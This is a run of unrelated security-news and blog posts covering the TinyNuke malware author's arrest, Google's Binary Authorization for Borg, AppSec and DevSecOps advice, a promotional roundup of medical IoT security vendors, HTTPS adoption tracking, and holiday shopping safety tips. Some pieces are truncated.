The source said the person behind the @tiny_gang Twitter account attacked French targets with custom versions of TinyNuke in one to three campaigns per week earlier this year, harvesting French bank accounts and laundering the stolen funds via a money mule network based mostly in the United Kingdom.

“If the guy behind this campaign is the malware author, it could easily explain the modifications happening with the malware, and his French is pretty good,” the researcher told KrebsOnSecurity. “He’s really provocative and I think he wants to be arrested in France because it could be a good way to become famous and maybe prove that his malware works (to resell it after?).”

The source said the TinyNuke author threatened him with physical harm after the researcher insulted his intelligence while trying to goad him into disclosing more details about his cybercrime activities.

“The guy has a serious ego problem,” the researcher said. “He likes when we talk about him and he hates when we mock him. He got really angry as time went by and started personally threatening me. In the last [TinyNuke malware configuration file] targeting Poland we found a long message dedicated to me with clear physical threats.”

All of the above is consistent with the findings detailed in the Le Parisien report, which quoted French investigators saying Antoine I. in October 2019 used a now-deleted Twitter account to taunt the authorities into looking for him. In one such post, he included a picture of himself holding a beer, saying: “On the train to Naples. You should send me a registered letter instead of threatening guys informally.”

The Le Parisien story also said Antoine I. threatened a researcher working with French authorities on the investigation (the researcher is referred to pseudonymously as “Marc”).

“I make a lot more money than you, I am younger, more intelligent,” Antoine I. reportedly wrote in July 2018 to Marc. “If you do not stop playing with me, I will put a bullet in your head. ”

French authorities say the defendant managed his extortion operations while traveling throughout Ukraine and other parts of Eastern Europe. But at some point he decided to return home to France, despite knowing investigators there were hunting him. According to Le Parisien, he told the French authorities he wanted to cooperate in the investigation and that he no longer wished to live like a fugitive.

Protecting programmatic access to user data with Binary Authorization for Borg

At Google, the safety of user data is our paramount concern and we strive to protect it comprehensively. That includes protection from insider risk, which is the possible risk that employees could use their organizational knowledge or access to perform malicious acts. Insider risk also covers the scenario where an attacker has compromised the credentials of someone at Google to facilitate their attack. There are times when it’s necessary for our services and personnel to access user data as part of fulfilling our contractual obligations to you: as part of their role, such as user support; and programmatically, as part of a service. Today, we’re releasing a whitepaper, “Binary Authorization for Borg: how Google verifies code provenance and implements code identity,” that explains one of the mechanisms we use to protect user data from insider risks on Google's cluster management system Borg.

Binary Authorization for Borg is a deploy-time enforcement check

Binary Authorization for Borg, or BAB, is an internal deploy-time enforcement check that reduces insider risk by ensuring that production software and configuration deployed at Google is properly reviewed and authorized, especially when that code has the ability to access user data. BAB ensures that code and configuration deployments meet certain standards prior to being deployed. BAB includes both a deploy-time enforcement service to prevent unauthorized jobs from starting, and an audit trail of the code and configuration used in BAB-enabled jobs.

BAB ensures that Google's official software supply chain process is followed. First, a code change is reviewed and approved before being checked into Google's central source code repository. Next, the code is verifiably built and packaged using Google's central build system. This is done by creating the build in a secure sandbox and recording the package's origin in metadata for verification purposes. Finally, the job is deployed to Borg, with a job-specific identity. BAB rejects any package that lacks proper metadata, that did not follow the proper supply chain process, or that otherwise does not match the identity’s predefined policy.

Binary Authorization for Borg allows for several kinds of security checks

BAB can be used for many kinds of deploy-time security checks. Some examples include:
  • Is the binary built from checked in code?
  • Is the binary built verifiably?
  • Is the binary built from tested code?
  • Is the binary built from code intended to be used in the deployment?
After deployment, a job is continuously verified for its lifetime, to check that jobs that were started (and any that may still be running) conform to updates to their policies.

Binary Authorization for Borg provides other security benefits
Though the primary purpose of BAB is to limit the ability of a potentially malicious insider to run an unauthorized job that could access user data, BAB has other security benefits. BAB provides robust code identity for jobs in Google’s infrastructure, tying a job’s identity to specific code, and ensuring that only the specified code can be used to exercise the job identity’s privileges. This allows for a transition from a job identity—trusting an identity and any of its privileged human users transitively—to a code identity—trusting a specific piece of reviewed code to have specific semantics and which cannot be modified without an approval process.

BAB also dictates a common language for data protection, so that multiple teams can understand and meet the same requirements. Certain processes, such as those for financial reporting, need to meet certain change management requirements for compliance purposes. Using BAB, these checks can be automated, saving time and increasing the scope of coverage.

Binary Authorization for Borg is part of the BeyondProd model
BAB is one of several technologies used at Google to mitigate insider risk, and one piece of how we secure containers and microservices in production. By using containerized systems and verifying their BAB requirements prior to deployment, our systems are easier to debug, more reliable, and have a clearer change management process. More details on how Google has adopted a cloud-native security model are available in another whitepaper we are releasing today, “BeyondProd: A new approach to cloud-native security.”

In summary, implementing BAB, a deploy-time enforcement check, as part of Google’s containerized infrastructure and continuous integration and deployment (CI/CD) process has enabled us to verify that the code and configuration we deploy meet certain standards for security. Adopting BAB has allowed Google to reduce insider risk, prevent possible attacks, and also support the uniformity of our production systems. For more information about BAB, read our whitepaper, “Binary Authorization for Borg: how Google verifies code provenance and implements code identity.”

Additional contributors to this whitepaper include Kevin Chen, Software Engineer; Tim Dierks, Engineering Director; Maya Kaczorowski, Product Manager; Gary O’Connor, Technical Writing; Umesh Shankar, Principal Engineer; Adam Stubblefield, Distinguished Engineer; and Wilfried Teiken, Software Engineer; with special recognition to the entire Binary Authorization for Borg team for their ideation, engineering, and leadership

AppSec Themes to Watch in 2020


Paul Farrington, Veracode EMEA CTO

Pejman Pourmousa, Veracode VP of Services

Chris Wysopal, Veracode CTO and co-founder

As we said in the introduction to our 10th anniversary State of Software Security report this year, the last 10 years in AppSec saw both enormous change, and a fair amount of stagnation. Part of the reason for the stagnation is that software development is increasing at unprecedented rates, and security is often struggling to keep up. So as we shift our focus from reflection to prediction, we think application security in 2020 will be all about new solutions and best practices to keep up with the pace of development and empower developers to code both quickly and securely. A few AppSec themes we expect to see renewed focus on in 2020 include:

Security champions

With a security skills shortage, and an explosion of software development, it’s time to get creative to spread security skills and know-how across development teams. A security champions program is becoming a popular way to do this, and we expect to see more of these programs in 2020. In a recently released report, Building an Enterprise DevSecOps Program, security analyst Adrian Lane notes, “I spoke with three midsized firms this week — their development personnel ranged from 800-2000 people, while their security teams ranged from 12 to 25.” In the same report, he says of assigning security champions to development teams, “Regardless of how you do it, this is an excellent way to scale security without scaling headcount, and we recommend you set aside some budget and resources — it returns far more benefits than it costs.”

A security champion is a developer with an interest in security who helps amplify the security message at the team level. Security champions don’t need to be security pros; they just need to act as the security conscience of the team, keeping their eyes and ears open for potential issues. Once the team is aware of these issues, it can then either fix the issues in development or call in your organization’s security experts to provide guidance.

With a security champion, an organization can make up for a lack of security coverage or skills by empowering a member of the development team to act as a force multiplier who can pass on security best practices, answer questions, and raise security awareness.

Metrics that make sense

Metrics — or perhaps more accurately, the right metrics — are crucial for understanding what’s really happening in your AppSec program. They serve a dual purpose: They demonstrate your organization’s current state, and also show what progress it’s making in achieving its objectives. 

On the flip side, focusing on the wrong metrics can lead to frustration, disengagement, and a stalled program. If you’ve got an overly stringent AppSec policy – for instance, “fix all flaws found within two weeks” – your metrics will not paint a pretty picture, and your developers will give up before they’ve begun. We think 2020 will be the year of getting AppSec metrics right with smart, achievable, sensible AppSec policies.

We will increasingly see a focus on providing developers with simple cues to encourage the right behavior, but in a realistic way. For example, teams start by classifying those security bugs that are highest priority, those that are important but not showstoppers, and those that, although not ideal, are acceptable to exist. Especially for the first two categories, they then track the average time to fix a security bug, baseline, and then negotiate targets so that engineers and product owners can buy-in. These metrics may ultimately help to determine compensation, but perhaps initially are linked to softer benefits for the team.

Security across the pipeline

We’re seeing organizations start to build security into each phase of the development pipeline, and expect to see more of this shift in 2020. From pre-commit scans in the the IDE (my code), to build scans in the CI pipeline (our code), to deployment scans in the CD pipeline (production code), security testing will cover code from inception to production.


DevSecOps is no longer niche—organizations are moving faster and producing more software than ever before. Scaling is the name of the AppSec game in 2020. AppSec programs that are cumbersome or slow to scale will not last in this new decade. What are the keys to scaling AppSec?

A SaaS-based solution: The time and budget required to quickly scale an on-premises AppSec solution make it ill equipped for a modern DevSecOps environment.

Expert help: Outside AppSec expertise can be useful in helping to establish your security program’s goals and roadmap. More importantly, it can help keep your roadmap on track by guiding developers through the fixing of flaws your scans find.

Security champions: As we discussed in the section above, security champions will be key to doing more with less security staff.


More and more security regulations are specifically calling out the need for application security – from NIST, to PCI, NY DFS, and GDPR. In turn, the need for a documented application security processes will become paramount in the new year. The Financial Services Sector Cybersecurity Profile from the FSSCC is an example of how FinTech firms are trying to unify reporting standards for the various regulatory frameworks.

Demand for secure software

IT buyers are increasingly questioning the security of software they are purchasing. If you can’t answer questions about your security practices or can’t address your customers’ audit requirements, you’re likely to experience lost or delayed sales opportunities. In some cases, prospects will turn elsewhere. However, vendors that can address these security concerns quickly and effectively stand out among suppliers and leverage security as a competitive advantage. A recent survey report we conducted with IDG found that 96 percent of respondents are more likely to consider doing business with a vendor or partner whose software has been independently verified as “secure.”

In addition, thanks to the speed of modern software delivery, we will see the methods for attesting to the security of software change. For example, we anticipate a shift to process-based attestations, such as proof of the security of an application’s development process (as with Veracode Verified), rather than point-in-time third-party pen tests. Point-in-time tests will carry less and less weight as the speed of software updates and changes increase.

What’s behind this demand for proof of security? It stems in part from new, more dire impacts from security breaches. When Target was breached in 2013, it created headlines for a few weeks, but it didn’t really affect its bottom line. Today, that has changed. Now we are seeing acquisitions fail, CEOs lose jobs, and stock values take hits because of breaches. Proving your software is secure will give companies an advantage in 2020.  

Learn more

Continue the conversation – join our upcoming discussion on AppSec in 2020 in our upcoming webinar, AppSec in 2020: What’s on the Horizon.

The 2020 State of Breach Protection Survey – Call for Participation

2010-2019 decade will be remembered as the time in which cybersecurity became acknowledged as a critical concern for all organizations. With rapidly growing security needs and respective budgets, it is now more essential than ever for security decision-makers to zoom out of the 'products' mindset and assess their security stack in light of the overall breach protection value that their

5 Promising vendors focusing on Cyber Security for Medical IoT (IoMT)

Medical IoT devices operate in care facility environments that encompass care giving, case management, customer service, and clinic management. As such, the risk of data gathered and managed by medical devices extends beyond the device itself. A compromise of clinic management services can propagate to IoT device command and control, allowing compromise of devices in attacks that do not directly touch the device at all. This is clearly the major driver for the emerging category of “Medical IoT (IoMT) Cyber Security ”

A large hospital for examples could be home to as many as 85,000 connected devices. While each of these devices has a significant role in the delivery of care and operational efficiency, each connected device also opens the door to a malicious cyberattack. A recent report from Irdeto,  found that 82 percent of healthcare organizations’ IoT devices have been targeted with a cyberattack within the last year.

Going over the players in this industry, it is clear that the Medical IoT security category includes a number of different approaches with the common target to provide the customer with a clear assets discovery and timely alerting on security breaches and attacks on its Medical environment.

Although many large security players are addressing this niche too, CyberDB identified a number of emerging players that are focusing on this industry and as such we expect them to benefit from the growth in this market. These players are (in alphabetical order):

Due to the clear use case and the growing awareness and need in this market, we can see general-purpose IoT security players moving towards the Medical IoT security market.

According a recent report by BisResearch, the overall Medical IoT Cyber security market has been witnessing a steady growth. The market is expected to continue to grow with a double digit CAGR of 41.38% during the forecast period 2019-2028.








CyberMDX is a pioneer in medical cyber security, delivering visibility, threat prevention and analytics for medical and IoT devices and clinical assets. It is a best of breed product built from the ground up for healthcare delivery organizations. CyberMDX is established in 2017, acts globally and raised so far $10M of funds. Its headquarters reside in Tel Aviv & New York City

 CyberMDX counters and prevents growing cyber-threats against hospitals, ensuring its critical assets operational continuity as well as patient and data safety. CyberMDX  delivers endpoint visibility, network threat prevention and operational analytics for medical, IoT, and OT devices. The agentless solution automates the most granular, context-aware device profiling available on the market and combines it with healthcare tailored risk assessment and remediation capabilities.

Using CyberMDX, healthcare teams can easily:

  • Audit devices for software vulnerabilities and prioritize patching
  • Detect malicious activity and behavioral anomalies, triggering responses accordingly
  • Manage risks proactively via smart micro-segmentation planning and automation
  • Streamline clinical compliancy programs
  • Report device-relevant FDA recalls
  • Optimize device allocation and procurement decision based on usage insights
  • Track and manage medical asset lifecycles
  • Provide rich reports in support of HIPAA and corporate compliance efforts
  • Seamlessly integrate with existing cyber and IT solutions to enrich data sets, enhance workflows, and enable operational excellence


  1. Interdepartmental HDO functionality and true workflow enablement: CyberMDX takes a holistic, 360° view of healthcare organizations and understands that only by building a common frame of reference and cross-departmental synergies can wholesale progress be achieved. Beyond mere security, CyberMDX provides security, IT, clinical engineering and compliance teams with a platform for data-driven workflow enablement and collaboration.
  2. Unmatched, context-aware visibility: CyberMDX delivers deep visibility into medical devices, protocols, and connected things of all sorts — along with a clear-eyed view of their clinical context. This deep and contextual visibility drives prevention, incident response, risk mitigation, and lifecycle management (including patch availability notifications). The solution covers medical devices, IoT, and OT across the entire network — providing a single pane of glass from which to view all connected healthcare assets.
  3. Superior depth and breadth of risk reporting around clinical and critical assets: CyberMDX has a dedicated research team focused solely on connected healthcare and IoMT. The team works with medical device manufactures and regulatory bodies such as CISA, ECRI, MITRE and the FDA to spot and lock down cybersecurity hazards and vulnerabilities before they can be exploited by malicious actors.





Cynerio was established in 2017 by a versatile team with expertise in cybersecurity, medical devices, and healthcare IT. Headquartered in New York City, Cynerio works with leading Healthcare Delivery Organizations (HDOs) worldwide and delivers the only medical-first cybersecurity solution clinical ecosystems require to stay secure and operate with the peace of mind they need to put their focus where it’s needed most: on patient care.

The Problem

The IoT is an emerging space with a broad sphere of challenges that gets even more complicated when placed in the healthcare context. Hospitals and other HDOs have limited visibility into which devices exist on their networks, device behavior, and vulnerabilities. This limited visibility and understanding impairs IT personnel’s ability to remediate without interrupting patient care.

Securing the healthcare IoT poses the multifold challenge of securing medical devices developed without security in mind. Many of these devices run on outdated operating systems and can’t be patched. Hospital staff often has limited knowledge of the scope of security risks and vulnerabilities introduced to the network by unprotected devices. This is further complicated by traditional security solutions that are ineffective in dealing with connected devices in general.

Hospitals also rely on various non-traditional medical devices to help deliver essential care, such as elevators used to transport patients and smart refrigerators used to store sensitive biological material and medications. These devices are connected to the clinical ecosystem and are involved in medical workflows but are often not given the proper priority when evaluating the security strategy.

The Solution

Cynerio’s holistic medical-first approach to healthcare  / Medical IoT cybersecurity management provides HDOs with a one-stop shop they can rely on by prioritizing patient care and privacy above all else while contextualizing risk and remediation within the framework of healthcare business goals. This approach to security allows HDOs to gain control over their clinical assets and helps achieve immediate security goals and meet strategic, long-term objectives.

Cynerio’s agentless and nonintrusive solution analyzes device communications and behavior to provide ongoing, accurate, and contextual assessments of risk and security posture. This enables swift remediation without impacting operations.






Medigate is a comprehensive platform for IoT cybersecurity. Distinguished by powerful capabilities driving use-cases that have revolutionized expectations around what clinical visibility can mean, Medigate is successfully partnering with health systems across the world to monetize risk reduction practice.

Not unlike other industries, Healthcare’s vaunted digital transformation is based on unprecedented, new levels of visibility. Although having the ability to identify connected endpoints represents a step forward, it is not the game-changer. Rather, it’s the device-specific, detailed attribution and utilization metrics passively captured by Medigate that competitively separates its offering. Made even more real by meaningful and fully operationalized integrations to the systems that can naturally benefit (e.g. NAC, firewalls, SIEM, CMMS and emerging applications in supply chain, procurement and finance), Medigate’s excellent track record with some of the nation’s largest health systems is easily verified.

It is not “magic” and Medigate’s engineering-heavy company profile reflects it. Medigate has done the heavy lift required to passively fingerprint all connected assets, including serially connected modules and/or devices “hidden” behind legacy and modern integration points. The approach is known as deep packet inspection (DPI).  Having invested in the engineering talent required to effectively parse the transmission flows between devices, nested modules, integration points and their payload destinations (e.g. EMRs), Medigate delivers the most detailed and accurate baselines available, while also providing continuously monitored, dynamic views of the entire connected ecosystem.

Emboldened by widely publicized and successful attacks, the FDA’s changing guidance, Joint Commission directives and the recognition by acute care providers that ultimately, it’s a patient safety issue, risk capital has poured into the problem space. Validating Medigate’s approach, competitors use deep packet inspection (DPI) when they can and rely on probabilistic methods (i.e. behavioral models promoted as AI) when they cannot. For DICOM and other protocols packaged in the HL7 framework, all vendors use DPI, but that’s as far as they go, and that’s a seminal difference. Solution evaluators should investigate that difference and make up their own minds.

Medigate’s deterministic approach relies on its proven ability to resolve more than one hundred unique medical device protocols encompassing thousands of common devices that would otherwise go uncovered. The skillsets required to do that, and the resulting superior data quality, have fueled far more meaningful system integrations, non-traditional cross functional collaborations and numerous new use-cases that are turning risk reduction into a more strategically diverse, revenue creation practice. In terms of clinical network visibility, Medigate-powered “views” of what’s now possible are strengthening IT’s ROI mission to the enterprise.






Sternum, the multilayered cybersecurity solution offering real-time, embedded protection for IoT devices, was founded in 2018 in Tel Aviv by a team of highly experienced R&D and business leaders. Sternum has a profound understanding of embedded systems and deep insights into the dynamics of today’s threats, offering a new standard of cybersecurity for medical IoT devices. In accordance with the FDA’s pre-market cybersecurity guidelines (which included our commentary), and with unique technology that is ensuring the security of all connected medical devices, Sternum is protecting patients’ lives.

The result: Robust defense of lifesaving devices such as pacemakers and insulin pumps by mitigating known threats while simultaneously adapting to and combating new ones.


The company has developed two holistic solutions:

  • Sternum’s Embedded Integrity Verification (EIV) identifies and blocks cyberattacks in real time. This integrity-based attack prevention can be deployed to any medical device, including distributed and unmanaged IoT devices. EIV operates like an on-device firewall, validating each operation within the device. EIV only needs to be deployed once. Once EIV is installed, every new piece of code (including 3rd party) receives protection automatically, fitting into the low resource environment of medical devices and providing security throughout the device’s lifecycle.
  • Sternum’s Real-time IoT Event Monitoring System (RIEMS) provides first-of-its-kind visibility from within IoT devices (including operating systems and other 3rd party components) so that OEMs who manufacture the devices, enterprises who implement them, and consumers who use them are immediately alerted to indications of any cyber breach, including prevented attack attempts. RIEMS also continuously monitors devices outside managed networks, enabling OEMs to maintain control of product security for all distributed devices.

How is Sternum’s software-only product suite revolutionary in the medical IoT world?

  • Sternum, as a high-diversity and platform-agnostic solution, is the only on-device, real-time cybersecurity solution supporting all types of real-time operating systems (RTOS) and homegrown OS.
  • Sternum’s solution operates during runtime with exceptionally low overhead of 3%.
  • Because it operates in real time, the solution thwarts zero-day attacks.
  • While network security solutions fail to adequately secure today’s distributed medical devices, Sternum provides real-time monitoring of devices outside managed networks.
  • Cyberattack prevention is near-perfect when utilizing Sternum’s EIV solution; for over 170 cyberattacks, 96.5% were prevented when benchmarked with RIPE (Runtime Intrusion Prevention Evaluator).

Sternum’s unique, flexible cyber security solution for the Internet of Medical Things (IoMT) can be seamlessly integrated with any medical device’s operating system and development process.







Founded in 2017 by serial cybersecurity entrepreneurs Netanel Davidi and Uri Alter, VDOO has raised $45 million from top-tier investors including 83North, Dell Technology Capital, WRVI Capital, GGV Capital, NTT DOCOMO Ventures and MS&AD ventures. The company currently has more than 65 employees at our offices in the US, Japan and Israel, and dozens of well-known customers around the globe including Medtronic, Stanley Healthcare, NTT and MS&AD.

With device security quickly becoming a strategic imperative for the healthcare market, product security teams that work on medical devices cannot keep making long-term decisions based on a partial picture of possible vulnerabilities at a single stage of the device lifecycle. In order to scale their ability to provide optimal security, they must replace the time- and resource-intensive point solutions they are using today with a single integrated platform.

This is where VDOO comes in. Our Product Security Platform for Connected Devices is the only automated security solution that is integrated across the entire medical device lifecycle – from design and development all the way to deployment, post-deployment and legacy. The end-to-end platform includes modules for security analysis, gap resolution, regulatory compliance, embedded protection, operations monitoring, executive insights and threat intelligence.

VDOO’s unique approach to providing optimal security for medical devices is based on the combination of our patented technology with advanced binary analysis and highly sophisticated machine learning capabilities. This is augmented by our research team, which includes some of the world’s leading embedded security experts, that has built the most comprehensive device security database available today based on the thorough analysis of hundreds of millions of binaries and tens of thousands of connected products.

The VDOO platform’s key differentiators and benefits:

  1. Contextual and focused device-specific security – Speed up time-to-market and reduce the risk of attacks by cutting out the noise and focusing on the right threats
  2. Automated security processes for the entire device lifecycle – Improve the efficiency of SDLC processes, reducing operational resource requirements across the board
  3. Verified compliance with leading standards and regulations – Increase product sales while improving customer adoption by ensuring that all devices are compliant
  4. Full visibility into the software supply chain – Reduce dependency on third parties by owning your security, thus lowering legal, monetary and reputational risks
  5. Comprehensive end-point security visibility and analytics – Monetize security as a business model by offering monitoring and protection services to end-users




The post 5 Promising vendors focusing on Cyber Security for Medical IoT (IoMT) appeared first on CyberDB.

Still Why No HTTPS?

Still Why No HTTPS?

Back in July last year, Scott Helme and I shipped a little pet project that tracked the world's largest websites not implementing HTTPS by default. We called it Why No HTTPS? and it gave people a way to see the largest websites not taking transport layer security seriously. We also broke the list down on a country-by-country basis and it quickly became a means of highlighting security gaps and serving as a "list of shame". I've had many organisations reach out and ask to be removed once they'd done their TLS things properly so clearly, the site is driving the right behaviour. Today, we're happy to share the first update since November last year.

The Web is More Secure More of the Time

Let's start with the good news: since the first release of this little project, HTTPS adoption has steadily trended upwards:

Still Why No HTTPS?

We've gone from 70% of all HTTP requests being over the secure scheme to 80% which is a pretty good effort in a relatively short amount of time. But, of course, it's the websites serving that remaining 20% of traffic that I want to focus on here. Let's being with where we source the list of top sites from and that's something we've changed for this release.

Bye Bye Alexa, Hello Tranco

When we launched the site, the list was based on the Alexa Top 1M. However, this list was becoming somewhat tricky to use reliably as Scott explained in October:

I used to use the Alexa Top 1 Million for this research but I've been having issues with the list. They tried to remove access at one point and while I managed to have it restored, there are other issues too. The accuracy of the data has been called into question and also the list itself has been having weird issues recently like not returning 1 million entries... Yep, that's right, the Alexa Top 1 Million list has been returning, in some cases, only ~650,000 entries recently, which is of course a problem.

Consequently, there are some differences in the way sites are ranked and as a result, there are some unexpected appearances. For example, the 21st largest site on the global list is Now obviously this isn't a website in the sense that folks go there looking for useful content (many would argue quite the contrary), but based on the Tranco data it's one of the most traffic'd websites in the world so it's within scope of this project.

So that's our starting point in terms of identifying which sites we assess, let's move onto the methodology around how a site ultimately makes our list.

Methodology and False-Positives

A quick recap on our methodology first: Scott runs a service which indexes a whole bunch of security things on the world's top million websites each day. He publishes the results of that effort via his free website (really Scott, .ninja?!) and I then roll the HTTP sites and HTTPS sites list into the Why No HTTPS? website. In that regard, it's quite simple. Except it's not really...

As I explained in this Q&A blog post last year, there are a whole bunch of reasons why a site that you see apparently doing things right might still be on our list. If you're going to chime in here with a bit of "But [blah].com loads over HTTPS by default for me", do please start by reading that blog post.

Read the post? Good! What we're left with pretty much boils down to an expectation that a site responds to an HTTP request over the insecure scheme with either a 301 or 302 (ideally the former so it's a permanent redirect) to a secure URL (multi-hop is also ok: a 301 to an HTTP address that then 301s to an HTTPS address is fine). If I make an insecure curl request from here in Australia, for example, and I get an HTTP 401 then the site goes onto the list. There has been some dissatisfaction over this methodology due to how much website behaviour can vary from location to location, so in this update we've added a means of getting a "free pass" that will automatically exclude a site from the list.

HSTS Preload Gives You an Immediate "Free Pass"

Preloaded HSTS is awesome (here's an old blog post that explains why). Once a site is pinned into the browser's static list of HSTS sites, insecure requests will always be upgraded and the 301 / 302 done by the website becomes redundant. Further, check out the requirements to be preloaded in the first place, in particular, this one:

Redirect from HTTP to HTTPS on the same host, if you are listening on port 80.

What this means is that if a site is in the preload list, we're comfortable excluding it from our list of shame. A great example of this is the domain I mentioned earlier - When I curl that address insecurely, here's what happens:

Still Why No HTTPS?

Arguably, this should keep the site in scope of being on our list but because it's been successfully preloaded and the browser simply won't allow an insecure request, it gets a free pass. Other notable "free pass" sites include (a curl for me just 301s to a www prefixed address served insecurely) and...

Still Why No HTTPS?

Over many years I've carefully honed a bunch of Cloudflare firewall rules to identify non-browser traffic that doesn't adhere to expected norms. The response above serves a body containing anti-automation (CAPTCHA) over the same scheme the request was made to (a Cloudflare behaviour). You shouldn't ever get that response in an actual browser but if you did, the fact that HSTS has been preloaded for the domain for years means the request would automatically be upgraded hence HIBP is really a false positive.

This practice of giving HSTS preloaded sites a free pass is something we hope will drive more websites in this direction. The next time someone reaches out and claims their site is incorrectly categorised that's going to be my first response - preload your domain then the next update to the site will keep you excluded.

Check the Diffs on GitHub

Lastly, if you'd like to see exactly what's changed in the data set, check out the public GitHub repository. You'll see all the input data and all the output data, the latter being precisely the files that drive the Why No HTTPS? website. I personally find it interesting to look at diffs on files such as the top50-au.json one as it gives me a really good sense of what's changed. I've ordered these files by domain name rather than rank to make things a little easier, but of course with ranks regularly changing anyway then the move from Alexa to Tranco there's going to be a heap of changes from last time even if the HTTPS status hasn't changed. At the very least though, it makes it super easy to see which sites have now dropped off the list altogether.

Comments Below

There's always a bunch of feedback on these releases and people often find really interesting things in the data. Do chime in below, keeping in mind the earlier point about reading the Q&A blog post first. And, of course, please continue to use this site as leverage to move more organisations in the "secure by default" direction.

Making Moves: How to Successfully Transition to DevSecOps

As we look toward the future, it is becoming critical that development organizations are not only agile and flexible but – just as important – secure. In turn, security and development need to work together more closely than ever before. When security and development are in unison, organizations can produce higher quality code quicker and more securely while reducing costs and conforming to regulations. Most companies realize that DevSecOps is the true nirvana, but they are not sure how to get there.

For starters, a successful transition to DevSecOps means that security and development teams need to reevaluate their roles. Ensuring the stability and security of software is no longer just the security team’s responsibility, it now includes developers. Developers should be testing, and security professionals should now be governing the testing. This culture shift can be a real challenge given that most security professionals have never worked alongside development teams and are not familiar with their processes, priorities, or tools. But once security and development teams are able to successfully work hand in hand, DevSecOps is achievable.  

With this culture shift in mind, how do we formulate an AppSec strategy that transforms DevOps into DevSecOps? In its new report, Building an Enterprise DevSecOps Program, analyst firm Securosis provides an outline of the security tools and techniques needed at each stage in the software development lifecycle:

Define and Architect Phase

Reference security architectures: Reference security architectures – or service provider guidelines for cloud services – to understand the rules and policies that dictate how applications operate and communicate. Once you are familiar with the security architecture, you should work with development to come up with operational standards. Some important operational standards to consider include minimal testing security requirements, time frames for fixing issues, and when to break a build.  

Security requirements: Decide which security tests should be run prior to deployment. Are you going to test for OWASP Top Ten vulnerabilities?

Monitoring and metrics: Consider what metrics you need to improve releases or problematic code or to determine what is working well. You should also think about what data you want to collect and build it into your CI/CD and production environments to measure how your scripts and tests perform.

Design Phase

Security design principles: Follow security design and operational principles because they offer valuable security improvement recommendations. Following these principles can be time consuming, but IT and development typically help because it benefits them as well.

Secure the deployment pipeline: Ensure that development and test environments are secure. Set up strict access controls for CI/CD pipelines and additional monitoring for scripts running continuously in the background.

Threat modeling: Teach the development team about common threat types and help them plan out tests to address attacks. If your security team is not able to address threat monitoring internally, you can consider hiring a consultant.

Develop Phase

Automate: Automating security testing at this phase is key.

Secure code repositories: Make it easy for developers to get secure and internally approved open source libraries. How? Consider keeping local copies of approved, easy-to-access libraries, and use a combination of composition analysis tools and scripts to make sure developers are using the approved versions.

Security in the scrum: Set up your "security champions" program, training selected members of the development teams in security basics, to help with these security tasks.

Test-driven development: Consider incorporating security into test-driven development, where tests are constructed along with code.  

Interactive Application Security Testing (IAST): Analyze your application’s code using IAST. The IAST scanner aims to find security vulnerabilities before you launch code into production.

Test Phase

Design for failure: The thought process behind this concept is, if there is a flaw with your application, it is better that you break it than an attacker.

Parallelize security testing: Address security tests that are slowing down your deployments by running multiple tests in parallel. Reconfiguring test environments for efficiency helps with Continuous Integration.

Pre-Release Phase

Elasticity: Make sure your security testing leverages on-demand elastic cloud services to speed up security testing.

Test data management: Prevent unnecessary data breaches by locking down production environments so quality assurance and development personnel cannot exfiltrate regulated data or bypass your security controls. Consider using tools like data masking or tokenization, which deliver test data derived from production data but without the sensitive information.

Deploy Phase

Manual vs. automated deployment: Use automation whenever possible. It is okay to use some manual processes, but it is important to remember that the more you automate, the more capacity the team will have to test and monitor. 

Deployment and rollback: Start by using smoke tests to make sure that the test code that worked in pre-deployment still works in deployment. Then, if you need to augment deployment, use one of these three tricks. The first is Blue-Green or Red-Black deployment. This is where old and new code run simultaneously on their own set of servers. The rollout is simple and, if errors are uncovered, the load balancers are pointed back to the older code. The second is canary testing. In canary testing, a small subset of individual sessions is directed toward the new code. If erors are encountered and the canary dies, the new code is retired until the issue is fixed. Lastly, feature tagging enables and disables new code elements. If event errors are found in a new section of code, you can toggle off the feature until it is fixed.

Production security tests: Note that it is common for applications to continue to function even when security controls fail. Consider employing penetration testers to examine the application at runtime for flaws.

Learn More

By embracing the role changes brought about by DevOps and working with developers to add security tools and techniques into the software delivery lifecycle, you can successfully transition to DevSecOps.

Get more detailed information on building out a DevSecOps program in the Securosis report, Building an Enterprise DevSecOps Program.

Webcast: Passwords: You Are the Weakest Link

Why are companies still recommending an 8-character password minimum?  Passwords are some of the easiest targets for attackers, yet companies still allow weak passwords in their environment. Multiple service providers recommend 8-character minimum passwords based on outdated data.  Download Slides: 3:26 – In The Beginning 4:23 – What The Experts Say: PCI 5:55 – What The Experts Say: […]

The post Webcast: Passwords: You Are the Weakest Link appeared first on Black Hills Information Security.

5 Reasons Why Programmers Should Think like Hackers

Programming has five main steps: the identification and definition of the problem, the planning of the solution for the problem, coding of the program, testing, and documentation. It's a meticulous process that cannot be completed without going through all the essential points. In all of these, security must be taken into account. As you come up with a solution to the problem and write the

Dominic Cummings: If Leave had lost Brexit vote, I’d have queried result as invalid

Boris Johnson aide wrote to data watchdog in 2017 complaining electoral system was ‘wide open to abuse’

Boris Johnson’s adviser Dominic Cummings would have challenged the EU referendum result as “invalid” had Vote Leave lost the Brexit campaign.

According to documents seen by the Observer, the prime minister’s chief aide told the UK’s data watchdog that he would have contested the result because UK elections are “wide open to abuse.”

Continue reading...

Cybersecurity Tips for Online Holiday Shopping

Reading Time: ~ 4 min.

The holiday shopping season is prime time for digital purchases and cybercriminals are cashing in on the merriment. With online shopping officially becoming more popular than traditional in-store visits this year, all signs point to an increase in cyberattacks. It’s more important than ever to be mindful of potential dangers so you can avoid getting Scrooged when buying online. Follow these top tips for secure online shopping.

Want to give the gift of cybersecurity? Internet Security Complete includes Identity Shield, designed to protect your browsing, shopping, banking, and social media.

Only use credit cards. If your debit card gets compromised, it has the potential to cascade in catastrophic ways; automatic bill payments may bounce or overdraft protections may drain secondary accounts. Some banks also have strict rules about when you need to notify them of suspected fraud, or else you could be liable for the costs.

On the other hand, the Fair Credit Billing Act provides some protections for consumers from unauthorized charges on credit cards. Additionally, it’s much easier to have your credit card replaced with new, uncompromised numbers and details than it is with bank account info.

Be cautious of deal and discount emails. During the holidays, there’s always a spike in physical and electronic mailers about special deals. At this point, we’re all used to that. We might even wait to buy something we want, knowing that it’ll probably go on sale during holiday clearance. Unfortunately, criminals use this expectation against us by sending cleverly crafted phishing emails to trick us into compromising our data.

Always be cautious about emails from unknown senders or even trusted third-party vendors, especially around the holidays. Always navigate to the deal website separately from the email — don’t just click the link. If the deal link can only be accessed through the email, it’s best to pass up on those supposed savings. It is also prime time for emails offering “free giftcards” avoid those like the plague.

